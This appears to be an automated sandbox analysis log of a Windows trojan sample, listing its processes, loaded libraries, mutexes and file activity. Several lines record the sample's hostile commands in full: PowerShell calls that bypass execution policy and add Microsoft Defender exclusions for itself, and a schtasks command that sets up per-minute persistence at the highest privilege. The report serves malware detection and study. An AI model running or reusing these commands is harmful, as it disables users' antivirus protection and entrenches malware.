            Source: SYSTEM.0.dr, Ifdhep5ZECNCbsHRRrCfe9toeHkrAfH417PI4PxHARviDbB41U8jDZEo0iv9c.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winEXE@19/21@1/1
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeFile created: C:\Users\user\AppData\Roaming\SYSTEMJump to behavior
            Source: C:\Users\user\AppData\Roaming\SYSTEMMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:824:120:WilError_03
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeMutant created: \Sessions\1\BaseNamedObjects\kIzRn1eiG3yt9dVz
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2668:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5460:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
            Source: 72OWK7wBVH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 72OWK7wBVH.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 72OWK7wBVH.exeReversingLabs: Detection: 76%
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeFile read: C:\Users\user\Desktop\72OWK7wBVH.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\72OWK7wBVH.exe "C:\Users\user\Desktop\72OWK7wBVH.exe"
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '72OWK7wBVH.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SYSTEM'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SYSTEM'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SYSTEM" /tr "C:\Users\user\AppData\Roaming\SYSTEM"
            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\SYSTEM C:\Users\user\AppData\Roaming\SYSTEM
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\SYSTEM C:\Users\user\AppData\Roaming\SYSTEM
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\SYSTEM C:\Users\user\AppData\Roaming\SYSTEM
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe'Jump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '72OWK7wBVH.exe'Jump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SYSTEM'Jump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SYSTEM'Jump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SYSTEM" /tr "C:\Users\user\AppData\Roaming\SYSTEM"Jump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
            Source: SYSTEM.lnk.0.drLNK file: ..\..\..\..\..\SYSTEM
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
